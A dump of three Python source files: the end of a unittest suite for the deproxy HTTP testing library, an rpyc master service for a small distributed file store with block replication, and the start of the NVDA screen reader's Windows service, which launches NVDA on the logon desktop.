self.deproxy.add_endpoint(port=self.port,
default_handler=self.custom_handler_method)
url = 'http://localhost:{0}/'.format(self.port)
mc = self.deproxy.make_request(url=url)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '602')
self.assertEqual(mc.received_response.code, '602')
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
class TestDeproxyDefaultHandler(unittest.TestCase):
def setUp(self):
self.port = get_next_deproxy_port()
def test_deproxy_default_handler_function(self):
def custom_handler(request):
return deproxy.Response(code='603', message='Custom', headers={},
body=None)
self.deproxy = deproxy.Deproxy(default_handler=custom_handler)
self.deproxy.add_endpoint(port=self.port)
url = 'http://localhost:{0}/'.format(self.port)
mc = self.deproxy.make_request(url=url)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '603')
self.assertEqual(mc.received_response.code, '603')
def custom_handler_method(self, request):
return deproxy.Response(code='604', message='Custom', headers={},
body=None)
def test_deproxy_default_handler_method(self):
self.deproxy = deproxy.Deproxy(
default_handler=self.custom_handler_method)
self.deproxy.add_endpoint(port=self.port)
url = 'http://localhost:{0}/'.format(self.port)
mc = self.deproxy.make_request(url=url)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '604')
self.assertEqual(mc.received_response.code, '604')
def tearDown(self):
if hasattr(self, 'deproxy') and self.deproxy is not None:
self.deproxy.shutdown_all_endpoints()
class TestOrphanedHandlings(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
self.other_client = deproxy.Deproxy()
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_orphaned_handling(self):
delayed_handler = deproxy.delay(4, deproxy.simple_handler)
self.long_running_mc = None
class Helper:
mc = None
helper = Helper()
def other_thread():
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port,
default_handler=delayed_handler)
helper.mc = mc
t = threading.Thread(target=other_thread)
t.daemon = True
t.start()
self.other_client.make_request('http://localhost:%i/' %
self.deproxy_port)
t.join()
self.assertEqual(len(helper.mc.orphaned_handlings), 1)
class TestEndpointShutdown(unittest.TestCase):
def setUp(self):
self.deproxy_port1 = get_next_deproxy_port()
self.deproxy_port2 = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
def test_shutdown(self):
e1 = self.deproxy.add_endpoint(self.deproxy_port1)
e2 = self.deproxy.add_endpoint(self.deproxy_port2)
e1.shutdown()
try:
e3 = self.deproxy.add_endpoint(self.deproxy_port1)
except socket.error as e:
self.fail('Address already in use: %s' % e)
class TestShutdownAllEndpoints(unittest.TestCase):
def setUp(self):
self.deproxy_port1 = get_next_deproxy_port()
self.deproxy_port2 = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
def test_shutdown(self):
e1 = self.deproxy.add_endpoint(self.deproxy_port1)
e2 = self.deproxy.add_endpoint(self.deproxy_port2)
self.deproxy.shutdown_all_endpoints()
try:
e3 = self.deproxy.add_endpoint(self.deproxy_port1)
except socket.error as e:
self.fail('add_endpoint through an exception: %s' % e)
try:
e4 = self.deproxy.add_endpoint(self.deproxy_port2)
except socket.error as e:
self.fail('add_endpoint through an exception: %s' % e)
class TestAutomaticRequestHeaders(unittest.TestCase):
def setUp(self):
self.port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.endpoint = self.deproxy.add_endpoint(self.port)
self.url = 'http://localhost:{}/'.format(self.port)
def tearDown(self):
if self.deproxy is not None:
self.deproxy.shutdown_all_endpoints()
def test_not_specified(self):
mc = self.deproxy.make_request(url=self.url)
self.assertIn('Host', mc.sent_request.headers)
#self.assertIn('host', mc.sent_request.headers)
self.assertIn('Accept', mc.sent_request.headers)
self.assertIn('Accept-Encoding', mc.sent_request.headers)
self.assertIn('User-Agent', mc.sent_request.headers)
def test_explicit_on(self):
mc = self.deproxy.make_request(url=self.url, add_default_headers=True)
self.assertIn('Host', mc.sent_request.headers)
#self.assertIn('host', mc.sent_request.headers)
self.assertIn('Accept', mc.sent_request.headers)
self.assertIn('Accept-Encoding', mc.sent_request.headers)
self.assertIn('User-Agent', mc.sent_request.headers)
def test_explicit_off(self):
mc = self.deproxy.make_request(url=self.url, add_default_headers=False)
self.assertNotIn('Host', mc.sent_request.headers)
#self.assertNotIn('host', mc.sent_request.headers)
self.assertNotIn('Accept', mc.sent_request.headers)
self.assertNotIn('Accept-Encoding', mc.sent_request.headers)
self.assertNotIn('User-Agent', mc.sent_request.headers)
class TestDefaultResponseHeaders(unittest.TestCase):
@classmethod
def setUpClass(self):
self.port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.endpoint = self.deproxy.add_endpoint(self.port)
self.url = 'http://localhost:{}/'.format(self.port)
@classmethod
def tearDownClass(self):
if self.deproxy is not None:
self.deproxy.shutdown_all_endpoints()
def handler1(self, request):
return deproxy.Response(code=606, message="Spoiler",
headers={"Header-Name": "Header-Value"},
body='Snape Kills Dumbledore')
def handler2(self, request):
return (deproxy.Response(code=606, message="Spoiler",
headers={"Header-Name": "Header-Value"},
body='Snape Kills Dumbledore'), True)
def handler3(self, request):
return (deproxy.Response(code=606, message="Spoiler",
headers={"Header-Name": "Header-Value"},
body='Snape Kills Dumbledore'), False)
def test_not_specified(self):
mc = self.deproxy.make_request(url=self.url,
default_handler=self.handler1)
self.assertEqual(len(mc.handlings), 1)
self.assertIn('server', mc.received_response.headers)
self.assertIn('date', mc.received_response.headers)
self.assertIn('Server', mc.handlings[0].response.headers)
self.assertIn('Date', mc.handlings[0].response.headers)
def test_explicit_on(self):
mc = self.deproxy.make_request(url=self.url,
default_handler=self.handler2)
self.assertEqual(len(mc.handlings), 1)
self.assertIn('server', mc.received_response.headers)
self.assertIn('date', mc.received_response.headers)
self.assertIn('Server', mc.handlings[0].response.headers)
self.assertIn('Date', mc.handlings[0].response.headers)
def test_explicit_off(self):
mc = self.deproxy.make_request(url=self.url,
default_handler=self.handler3)
self.assertEqual(len(mc.handlings), 1)
self.assertNotIn('server', mc.received_response.headers)
self.assertNotIn('date', mc.received_response.headers)
self.assertNotIn('server', mc.handlings[0].response.headers)
self.assertNotIn('date', mc.handlings[0].response.headers)
self.assertNotIn('Server', mc.received_response.headers)
self.assertNotIn('Date', mc.received_response.headers)
self.assertNotIn('Server', mc.handlings[0].response.headers)
self.assertNotIn('Date', mc.handlings[0].response.headers)
class TestHeaderCollection(unittest.TestCase):
def setUp(self):
self.headers = deproxy.HeaderCollection()
def test_length(self):
self.assertEqual(len(self.headers), 0)
self.headers.add('Name', 'Value')
self.assertEqual(len(self.headers), 1)
def test_contains(self):
self.headers.add('Name', 'Value')
self.assertTrue('Name' in self.headers)
def test_contains_case(self):
self.headers.add('Name', 'Value')
self.assertTrue('name' in self.headers)
def test_assertIn_case(self):
self.headers.add('Name', 'Value')
self.assertIn('name', self.headers)
def test_find_all(self):
self.headers.add('A', 'qwerty')
self.headers.add('B', 'asdf')
self.headers.add('C', 'zxcv')
self.headers.add('A', 'uiop')
self.headers.add('A', 'jkl;')
result = [value for value in self.headers.find_all('A')]
self.assertEqual(result, ['qwerty', 'uiop', 'jkl;'])
def test_bracket_case(self):
self.headers.add('Name', 'Value')
try:
self.assertEqual(self.headers['name'], 'Value')
except:
self.fail()
def test_get(self):
self.headers.add('Name', 'Value')
self.assertIn('name', self.headers)
self.assertEqual(self.headers.get('Name'), 'Value')
self.assertEqual(self.headers.get('name'), 'Value')
self.assertIsNone(self.headers.get('asdf'))
self.assertEqual(self.headers.get('name', default='zxcv'), 'Value')
self.assertEqual(self.headers.get('asdf', default='zxcv'), 'zxcv')
class TestBodies(unittest.TestCase):
def setUp(self):
self.deproxy = deproxy.Deproxy()
self.port = get_next_deproxy_port()
self.deproxy.add_endpoint(self.port)
self.url = 'http://localhost:{0}/'.format(self.port)
def test_request_body(self):
body = """ This is the body
This is the next paragraph.
"""
mc = self.deproxy.make_request(url=self.url, method='POST',
request_body=body)
self.assertEqual(mc.sent_request.body, body)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].request.body, body)
def test_response_body(self):
body = """ This is another body
This is the next paragraph.
"""
def custom_handler(request):
return deproxy.Response(code=200, message='OK', headers=None,
body=body)
mc = self.deproxy.make_request(url=self.url,
default_handler=custom_handler)
self.assertEqual(mc.received_response.body, body)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.body, body)
def test_request_body_chunked(self):
data = ["0" * 16 for _ in xrange(10)] + [""]
body = "\r\n".join(map(lambda chunk: "%0.2X\r\n%s" % (len(chunk), chunk), data))
mc = self.deproxy.make_request(url=self.url, method='POST',
headers={"Transfer-Encoding": "chunked"},
request_body=body)
self.assertEqual(mc.sent_request.body, body)
self.assertEqual(mc.sent_request.headers.get("Content-Length"), None)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].request.body, "".join(data))
def test_response_body_chunked(self):
chunked_body = "4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n"
body = "Wikipedia"
def custom_handler(request):
return deproxy.Response(code=200, message='OK',
headers={'transfer-encoding': 'chunked'},
body=chunked_body)
mc = self.deproxy.make_request(url=self.url,
default_handler=custom_handler)
self.assertEqual(mc.received_response.body, body)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.body, chunked_body)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
class TestSendingHeaders(unittest.TestCase):
def setUp(self):
self.deproxy = deproxy.Deproxy()
self.port = get_next_deproxy_port()
self.deproxy.add_endpoint(self.port)
self.url = 'http://localhost:{0}/'.format(self.port)
def test_send_duplicate_request_headers(self):
headers = deproxy.HeaderCollection()
headers.add('Name', 'Value1')
headers.add('Name', 'Value2')
mc = self.deproxy.make_request(url=self.url, headers=headers)
self.assertEqual(len(mc.handlings), 1)
values = [value for value in
mc.handlings[0].request.headers.find_all('Name')]
self.assertEqual(values, ['Value1, Value2'])
def test_send_duplicate_response_headers(self):
def custom_handler(request):
headers = deproxy.HeaderCollection()
headers.add('Name', 'Value1')
headers.add('Name', 'Value2')
return deproxy.Response(code=200, message='OK', headers=headers,
body=None)
mc = self.deproxy.make_request(url=self.url,
default_handler=custom_handler)
self.assertEqual(len(mc.handlings), 1)
values = [value for value in
mc.received_response.headers.find_all('Name')]
self.assertEqual(values, ['Value1, Value2'])
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
class TestPerEndpointHandlers(unittest.TestCase):
def setUp(self):
self.deproxy = deproxy.Deproxy()
self.endpoint1 = self.deproxy.add_endpoint(
name='test-endpoint-1',
port=get_next_deproxy_port())
self.endpoint2 = self.deproxy.add_endpoint(
name='test-endpoint-2',
port=get_next_deproxy_port())
def custom_handler1(request):
return deproxy.Response(code='605', message='Custom', headers={},
body=None)
def custom_handler2(request):
return deproxy.Response(code='606', message='Spoiler', headers={},
body=None)
self.custom_handler1 = custom_handler1
self.custom_handler2 = custom_handler2
self.url1 = 'http://localhost:{0}/'.format(self.endpoint1.port)
self.url2 = 'http://localhost:{0}/'.format(self.endpoint2.port)
def test_no_handlers(self):
mc = self.deproxy.make_request(url=self.url1)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '200')
self.assertEqual(mc.received_response.code, '200')
mc = self.deproxy.make_request(url=self.url2)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '200')
self.assertEqual(mc.received_response.code, '200')
def test_empty_handlers(self):
mc = self.deproxy.make_request(url=self.url1, handlers={})
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '200')
self.assertEqual(mc.received_response.code, '200')
mc = self.deproxy.make_request(url=self.url2, handlers={})
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '200')
self.assertEqual(mc.received_response.code, '200')
def test_both_handlers(self):
handlers = {self.endpoint1: self.custom_handler1,
self.endpoint2: self.custom_handler2}
mc = self.deproxy.make_request(url=self.url1, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '605')
self.assertEqual(mc.received_response.code, '605')
mc = self.deproxy.make_request(url=self.url2, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '606')
self.assertEqual(mc.received_response.code, '606')
def test_one_handler(self):
handlers = {self.endpoint1: self.custom_handler1}
mc = self.deproxy.make_request(url=self.url1, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '605')
self.assertEqual(mc.received_response.code, '605')
mc = self.deproxy.make_request(url=self.url2, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '200')
self.assertEqual(mc.received_response.code, '200')
def test_handlers_by_name(self):
handlers = {'test-endpoint-1': self.custom_handler1,
'test-endpoint-2': self.custom_handler2}
mc = self.deproxy.make_request(url=self.url1, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '605')
self.assertEqual(mc.received_response.code, '605')
mc = self.deproxy.make_request(url=self.url2, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '606')
self.assertEqual(mc.received_response.code, '606')
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
class TestSSLEndpoint(unittest.TestCase):
def setUp(self):
self.deproxy = deproxy.Deproxy()
self.port = get_next_deproxy_port()
self.deproxy.add_endpoint(self.port,
ssl_enable=True,
ssl_certs={'certfile': './test.crt',
'keyfile': './test.key'})
self.url = 'https://localhost:{0}/'.format(self.port)
def test_ssl_request(self):
body = """ This is the body
This is the next paragraph.
"""
mc = self.deproxy.make_request(url=self.url, method='POST',
request_body=body,
ssl_options={'certfile': './test.crt',
'keyfile': './test.key'},
verify=False)
self.assertEqual(mc.sent_request.body, body)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].request.body, body)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def run():
parser = argparse.ArgumentParser()
parser.add_argument('--port-base', help='The base port number to use when '
'assigning ports to tests. Each test case uses the '
'next lower port number than the test case before. '
'The default is 9999.', default=9999, type=int)
parser.add_argument('--print-log', action='store_true',
help='Print the log.')
args = parser.parse_args()
if args.print_log:
logging.basicConfig(level=logging.DEBUG,
format=('%(asctime)s %(levelname)s:%(name)s:'
'%(funcName)s:'
'%(filename)s(%(lineno)d):'
'%(threadName)s(%(thread)d):%(message)s'))
global deproxy_port_base
deproxy_port_base = args.port_base
unittest.main(argv=[''])
if __name__ == '__main__':
run()
|
master.py
|
import copy
import logging
import math
import os
import random
import sys
import uuid
from threading import Thread
from time import sleep
import rpyc
from rpyc.utils.server import ThreadedServer
from conf import BLOCK_SIZE, REPLICATION_FACTOR, \
DEFAULT_MINION_PORTS, DEFAULT_MASTER_PORTS, LOG_DIR
class MasterService(rpyc.Service):
class exposed_Master(object):
# Map file_name to block_ids
file_table = {} # {'file_name': [bid1, bid2, bid3]}
# Map block_id to where it's saved
block_mapping = {} # {'bid': [mid1, mid2, mid3]}
# Map mid to what's saved on it
minion_content = {} # {'mid': [bid1, bid2, bid3]}
# Register the information of every minion
minions = {} # {'mid': (host, port)}
master_list = tuple()
block_size = 0
replication_factor = 0
health_monitoring = 0
def exposed_read(self, fname):
if fname in self.__class__.file_table:
return [(block_id, self.__class__.block_mapping[block_id])
for block_id in self.__class__.file_table[fname]]
return None
def exposed_delete(self, fname, prop=True):
# def siblings_delete(fname):
# for (h, p) in self.__class__.master_list:
# try:
# m = rpyc.connect(h, p)
# m.root.Master().delete(fname, False)
# except ConnectionRefusedError:
# continue
#
# if prop:
# Thread(target=siblings_delete, args=[fname]).start()
#
for block_id in self.__class__.file_table[fname]:
for mid in self.__class__.block_mapping[block_id]:
m_cont = self.__class__.minion_content[mid]
self.__class__.minion_content[mid] = \
tuple(filter(lambda x, bid=block_id: x != bid, m_cont))
del self.__class__.block_mapping[block_id]
del self.__class__.file_table[fname]
def exposed_write(self, dest, size):
if len(self.__class__.minions) < self.__class__.replication_factor:
return 'not enough minions to hold {} replications'.format(\
self.__class__.replication_factor)
if self.exists(dest):
self.wipe(dest)
self.exposed_delete(dest)
self.__class__.file_table[dest] = tuple()
num_blocks = self.calc_num_blocks(size)
blocks = self.alloc_blocks(dest, num_blocks)
return blocks
def exposed_get_block_size(self):
return self.__class__.block_size
def exposed_get_minions(self, mid_list):
return tuple(self.__class__.minions.get(mid) for mid in mid_list)
def exposed_get_minion(self, mid):
return self.__class__.minions.get(mid)
def exposed_admin_delete_minion(self, mid):
# peacefully (intentionally) delete minion
# where deleted minion's data gets replicated.
self.exposed_replicate(mid)
# def sublings_delete_minion(mid):
# for (h, p) in self.__class__.master_list:
# try:
# m = rpyc.connect(h, p)
# m.root.Master().delete_minion(mid)
# except ConnectionRefusedError:
# continue
self.exposed_delete_minion(mid)
#Thread(target=sublings_delete_minion, args=[mid]).start()
def exposed_delete_minion(self, mid):
# 'delete minion' in a sense where we only update Master metadata
del self.__class__.minions[mid]
for block_id in self.__class__.minion_content[mid]:
b_map = self.__class__.block_mapping[block_id]
new_b_map = tuple(filter(lambda x: x != mid, b_map))
self.__class__.block_mapping[block_id] = new_b_map
# minion.delete(block_id)
del self.__class__.minion_content[mid]
def exposed_add_minion(self, host, port):
if not self.__class__.minions:
mid = 0
else:
mid = max(self.__class__.minions) + 1
self.__class__.minions[mid] = (host, port)
self.__class__.minion_content[mid] = tuple()
self.flush_attr_entry('minions', mid)
self.flush_attr_entry('minion_content', mid)
# print('[Master] add minion complete', self.__class__.minions)
def exposed_replicate(self, mid):
for block_id in self.__class__.minion_content[mid]:
locations = self.__class__.block_mapping[block_id]
source_mid = random.choice([x for x in locations if x != mid])
target_mid = random.choice([x for x in self.__class__.minions if
x not in locations])
# Replicate block from source to target
self.replicate_block(block_id, source_mid, target_mid)
# Update information registered on Master
self.__class__.block_mapping[block_id] += (target_mid,)
self.__class__.minion_content[target_mid] += (block_id,)
self.flush_attr_entry('block_mapping', block_id)
self.flush_attr_entry('minion_content', target_mid)
# current state of minion cluster
def exposed_health_report(self):
if not self.__class__.health_monitoring:
Thread(target=self.health_monitor).start()
self.__class__.health_monitoring = 1
return self.health_check()
def exposed_update_attr(self, a_name, a_value, wipe_original=False):
# update_attr is used by self.flush method.
# a_name is the table we wish to update
# a_value is the new values (in the form of tupled dict_items)
old_attr = getattr(self.__class__, a_name)
assert isinstance(old_attr, dict) and isinstance(a_value, tuple)
# update given attribute using the given update values
setattr(self.__class__, a_name, dict(a_value + \
(tuple() if wipe_original else tuple(old_attr.items()))))
def exposed_update_masters(self, M):
# M is the new master list
self.__class__.master_list = M
def exposed_new_sibling(self, m):
# I, the primary master, was introduced to a new sibling
# I am going to flush all my data onto the new sibling
host, port = m
con = rpyc.connect(host, port)
siblng = con.root.Master()
for t in ('file_table', 'block_mapping',\
'minion_content', 'minions'):
table = getattr(self.__class__, t)
siblng.update_attr(t, tuple(table.items()), wipe_original=True)
###############################################################################
# Private functions
###############################################################################
def flush(self, table, entry_key, wipe):
# flush one entry in the given attr table to other masters
attr = getattr(self.__class__, table)
# if 'wipe' flag is on, it means that the entire table is flushed
update_dict = attr if wipe else {entry_key: attr[entry_key]}
# 'Yo, master brothers and sisters:
# this `table[entry_key]` got updated, I'm updating you guys.'
# TODO: parallel this.
for (h, p) in self.__class__.master_list:
try:
m = rpyc.connect(h, p)
m.root.Master().update_attr(table, \
tuple(update_dict.items()), wipe_original=wipe)
except ConnectionRefusedError:
continue
def flush_attr_entry(self, table, entry_key):
Thread(target=self.flush, args=[table, entry_key, False]).start()
def flush_attr_table(self, table):
Thread(target=self.flush, args=[table, None, True]).start()
def alloc_blocks(self, dest, num):
blocks = []
for _ in range(num):
block_uuid = str(uuid.uuid1())
nodes_ids = random.sample(self.__class__.minions.keys(),
self.__class__.replication_factor)
self.__class__.block_mapping[block_uuid] = nodes_ids
for mid in nodes_ids:
self.__class__.minion_content[mid] += (block_uuid,)
blocks.append((block_uuid, nodes_ids))
self.__class__.file_table[dest] += (block_uuid,)
self.flush_attr_entry('file_table', dest)
self.flush_attr_table('block_mapping')
self.flush_attr_table('minion_content')
return blocks
def calc_num_blocks(self, size):
return int(math.ceil(float(size) / self.__class__.block_size))
def minion_lost_handler(self, status):
# TODO
logging.info('1 or more minion dead, status: %s', format(status))
lost_minions = [mid for mid, value in status.items() if not value]
for mid in lost_minions:
self.exposed_admin_delete_minion(mid)
logging.info('Replicate done')
def health_monitor(self):
# actively reach out to minions forever
# SIDE EFFECT: calls minion_lost_handler when
while 1:
minions_status = self.health_check()
if not all(minions_status.values()):
self.minion_lost_handler(minions_status)
sleep(0.2)
def health_check(self):
# reach out to known minions on file
# RETURN {minion -> [10]}
res = {}
minions = copy.deepcopy(self.__class__.minions)
for m, (host, port) in minions.items():
try:
con = rpyc.connect(host, port=port)
minion = con.root.Minion()
res[m] = 1 if minion.ping() == 'pong' else 0
con.close()
except ConnectionRefusedError:
res[m] = 0
return res
def exists(self, f):
return f in self.__class__.file_table
def replicate_block(self, block_id, source, target):
source_host, source_port = self.__class__.minions[source]
target_host, target_port = self.__class__.minions[target]
con = rpyc.connect(source_host, port=source_port)
minion = con.root.Minion()
minion.replicate(block_id, target_host, target_port)
def wipe(self, fname):
for block_uuid in self.__class__.file_table[fname]:
node_ids = self.__class__.block_mapping[block_uuid]
for m in self.exposed_get_minions(node_ids):
host, port = m
con = rpyc.connect(host, port=port)
minion = con.root.Minion()
minion.delete(block_uuid)
return
def startMasterService(minion_ports=DEFAULT_MINION_PORTS,
master_port=DEFAULT_MASTER_PORTS[0],
block_size=BLOCK_SIZE,
replication_factor=REPLICATION_FACTOR):
logging.basicConfig(filename=os.path.join(LOG_DIR, 'master'),
format='%(asctime)s--%(levelname)s:%(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
level=logging.DEBUG)
# load and use conf file, restore from dump if possible.
master = MasterService.exposed_Master
master.block_size = block_size
master.replication_factor = replication_factor
# for index, minion_port in enumerate(minion_ports):
# It is ok to do so because we only test locally
# host = '127.0.0.1'
# port = minion_port
# master.minions[index + 1] = (host, port)
# master.minion_content[index + 1] = []
logging.info('Current Config:')
logging.info('Block size: %d, replication_faction: %d, minions: %s',
master.block_size, master.replication_factor,
str(master.minions))
t = ThreadedServer(MasterService, port=master_port)
t.start()
if __name__ == '__main__':
# by default use config.py
startMasterService(master_port=int(sys.argv[1]))
|
nvda_service.py
|
#nvda_service.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2009-2011 NV Access Inc
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
from ctypes import *
from ctypes.wintypes import *
import threading
import win32serviceutil
import win32service
import sys
import os
import time
import subprocess
import _winreg
import winVersion
CREATE_UNICODE_ENVIRONMENT=1024
INFINITE = 0xffffffff
UOI_NAME = 2
SYNCHRONIZE = 0x100000
WAIT_OBJECT_0 = 0
MAXIMUM_ALLOWED = 0x2000000
SecurityIdentification = 2
TokenPrimary = 1
PROCESS_QUERY_INFORMATION = 0x0400
TokenSessionId = 12
TokenUIAccess = 26
WTS_CONSOLE_CONNECT = 0x1
WTS_CONSOLE_DISCONNECT = 0x2
WTS_SESSION_LOGON = 0x5
WTS_SESSION_LOGOFF = 0x6
WTS_SESSION_LOCK = 0x7
WTS_SESSION_UNLOCK = 0x8
WTS_CURRENT_SERVER_HANDLE = 0
WTSUserName = 5
nvdaExec = os.path.join(sys.prefix,"nvda.exe")
slaveExec = os.path.join(sys.prefix,"nvda_slave.exe")
nvdaSystemConfigDir=os.path.join(sys.prefix,'systemConfig')
class AutoHANDLE(HANDLE):
"""A HANDLE which is automatically closed when no longer in use.
"""
def __del__(self):
if self:
windll.kernel32.CloseHandle(self)
isDebug = False
def debug(msg):
if not isDebug:
return
try:
file(os.path.join(os.getenv("windir"), "temp", "nvda_service.log"), "a").write(msg + "\n")
except (OSError, IOError):
pass
def getInputDesktopName():
desktop = windll.user32.OpenInputDesktop(0, False, 0)
name = create_unicode_buffer(256)
windll.user32.GetUserObjectInformationW(desktop, UOI_NAME, byref(name), sizeof(name), None)
windll.user32.CloseDesktop(desktop)
return ur"WinSta0\%s" % name.value
class STARTUPINFO(Structure):
_fields_=[
('cb',DWORD),
('lpReserved',LPWSTR),
('lpDesktop',LPWSTR),
('lpTitle',LPWSTR),
('dwX',DWORD),
('dwY',DWORD),
('dwXSize',DWORD),
('dwYSize',DWORD),
('dwXCountChars',DWORD),
('dwYCountChars',DWORD),
('dwFillAttribute',DWORD),
('dwFlags',DWORD),
('wShowWindow',WORD),
('cbReserved2',WORD),
('lpReserved2',POINTER(c_byte)),
('hSTDInput',HANDLE),
('hSTDOutput',HANDLE),
('hSTDError',HANDLE),
]
class PROCESS_INFORMATION(Structure):
_fields_=[
('hProcess',HANDLE),
('hThread',HANDLE),
('dwProcessID',DWORD),
('dwThreadID',DWORD),
]
def getLoggedOnUserToken(session):
# Only works in Windows XP and above.
token = AutoHANDLE()
windll.wtsapi32.WTSQueryUserToken(session, byref(token))
return token
def duplicateTokenPrimary(token):
newToken = AutoHANDLE()
windll.advapi32.DuplicateTokenEx(token, MAXIMUM_ALLOWED, None, SecurityIdentification, TokenPrimary, byref(newToken))
return newToken
def getOwnToken():
process = AutoHANDLE(windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, os.getpid()))
token = AutoHANDLE()
windll.advapi32.OpenProcessToken(process, MAXIMUM_ALLOWED, byref(token))
return token
def getSessionSystemToken(session):
token = duplicateTokenPrimary(getOwnToken())
session = DWORD(session)
windll.advapi32.SetTokenInformation(token, TokenSessionId, byref(session), sizeof(DWORD))
return token
def executeProcess(desktop, token, executable, *argStrings):
argsString=subprocess.list2cmdline(list(argStrings))
startupInfo=STARTUPINFO(cb=sizeof(STARTUPINFO),lpDesktop=desktop)
processInformation=PROCESS_INFORMATION()
cmdBuf=create_unicode_buffer(u'"%s" %s'%(executable,argsString))
if token:
env=c_void_p()
windll.userenv.CreateEnvironmentBlock(byref(env),token,False)
try:
if windll.advapi32.CreateProcessAsUserW(token, None, cmdBuf,None,None,False,CREATE_UNICODE_ENVIRONMENT,env,None,byref(startupInfo),byref(processInformation)) == 0:
raise WinError()
finally:
windll.userenv.DestroyEnvironmentBlock(env)
else:
if windll.kernel32.CreateProcessW(None, cmdBuf,None,None,False,0,None,None,byref(startupInfo),byref(processInformation)) == 0:
raise WinError()
windll.kernel32.CloseHandle(processInformation.hThread)
return AutoHANDLE(processInformation.hProcess)
def nvdaLauncher():
initDebug()
desktop = getInputDesktopName()
debug("launcher: starting with desktop %s" % desktop)
desktopBn = os.path.basename(desktop)
if desktopBn != u"Winlogon" and not desktopBn.startswith(u"InfoCard{"):
debug("launcher: user or screen-saver desktop, exiting")
return
debug("launcher: starting NVDA")
process = startNVDA(desktop)
desktopSwitchEvt = AutoHANDLE(windll.kernel32.OpenEventW(SYNCHRONIZE, False, u"WinSta0_DesktopSwitch"))
windll.kernel32.WaitForSingleObject(desktopSwitchEvt, INFINITE)
debug("launcher: desktop switch, exiting NVDA on desktop %s" % desktop)
exitNVDA(desktop)
# NVDA should never ever be left running on other desktops, so make certain it is dead.
# It may still be running if it hasn't quite finished initialising yet, in which case -q won't work.
windll.kernel32.TerminateProcess(process, 1)
def startNVDA(desktop):
token=duplicateTokenPrimary(getOwnToken())
windll.advapi32.SetTokenInformation(token,TokenUIAccess,byref(c_ulong(1)),sizeof(c_ulong))
return executeProcess(desktop, token, nvdaExec)
def exitNVDA(desktop):
token=duplicateTokenPrimary(getOwnToken())
windll.advapi32.SetTokenInformation(token,TokenUIAccess,byref(c_ulong(1)),sizeof(c_ulong))
process = executeProcess(desktop, token, nvdaExec, "-q")
windll.kernel32.WaitForSingleObject(process, 10000)
def isUserRunningNVDA(session):
token = duplicateTokenPrimary(getSessionSystemToken(session))
windll.advapi32.SetTokenInformation(token,TokenUIAccess,byref(c_ulong(1)),sizeof(c_ulong))
process = executeProcess(ur"WinSta0\Default", token, nvdaExec, u"--check-running")
windll.kernel32.WaitForSingleObject(process, INFINITE)
exitCode = DWORD()
windll.kernel32.GetExitCodeProcess(process, byref(exitCode))
return exitCode.value == 0
def isSessionLoggedOn(session):
username = c_wchar_p()
size = DWORD()
windll.wtsapi32.WTSQuerySessionInformationW(WTS_CURRENT_SERVER_HANDLE, session, WTSUserName, byref(username), byref(size))
ret = bool(username.value)
windll.wtsapi32.WTSFreeMemory(username)
return ret
def execBg(func):
t = threading.Thread(target=func)
t.setDaemon(True)
t.start()
def shouldStartOnLogonScreen():
try:
k = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, ur"SOFTWARE\NVDA")
return bool(_winreg.QueryValueEx(k, u"startOnLogonScreen")[0])
except WindowsError:
return False
def initDebug():
global isDebug
try:
k = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, ur"SOFTWARE\NVDA")
isDebug = bool(_winreg.QueryValueEx(k, u"serviceDebug")[0])
except WindowsError:
isDebug = False
class NVDAService(win32serviceutil.ServiceFramework):
_svc_name_="nvda"
_svc_display_name_="NVDA"
def GetAcceptedControls(self):
return win32serviceutil.ServiceFramework.GetAcceptedControls(self) | win32service.SERVICE_ACCEPT_SESSIONCHANGE
def initSession(self, session):
debug("init session %d" % session)
self.session = session
self.launcherLock = threading.RLock()
self.launcherStarted = False
self.desktopSwitchSupervisorStarted = False
self.isSessionLoggedOn = isSessionLoggedOn(session)
debug("session logged on: %r" % self.isSessionLoggedOn)
if self.isWindowsXP and session != 0 and not self.isSessionLoggedOn:
